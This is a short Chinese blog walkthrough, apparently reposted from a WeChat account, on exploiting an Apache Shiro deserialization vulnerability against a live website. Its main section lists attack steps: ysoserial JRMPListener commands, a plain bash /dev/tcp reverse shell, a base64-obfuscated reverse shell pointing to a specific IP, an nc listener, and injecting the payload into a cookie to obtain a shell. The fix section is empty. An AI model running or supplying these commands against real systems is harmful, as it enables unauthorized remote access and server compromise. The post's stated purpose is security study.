0x01.前言
0x02.渗透过程
1)网站环境
2)探测登录框架
3)步入洞点
4)深入探测Shiro反序列化漏洞
1.在公网 vps 执行下列命令:
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1066 CommonsCollections5
bash -i > /dev/tcp/ip/port 0>& 1
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1066 CommonsCollections5 “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yMTIuNjQuODcuMy8xMjM0IDA+JiAx}|{base64,-d}|{bash,-i}”
2.使用 exp 生成 payload
Python exp.py 公网ip:port(这边有一点要避雷)
3.公网 vps 开启 nc 监听
Nc -lvp 1234 (监听1234端口)
4.抓任意 http 数据包,在 cookie 中追加 payload。GoGoGo
5.成功拿到shell
0x03.修复方案
0x04.总结
1.了解基本的网站架构
2.抓包探测确定中间件
3.了解各类中间件和框架的漏洞
4.熟悉并熟练掌握Shiro漏洞的利用方式
5.熟悉nc的使用方法
6.多积累,多学习,多练习
作者:Adminxe,转载于https://blog.csdn.net/Adminxe
关注公众号:HACK之道
本文始发于微信公众号(HACK之道):实战渗透-Shiro反序列化漏洞实例
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论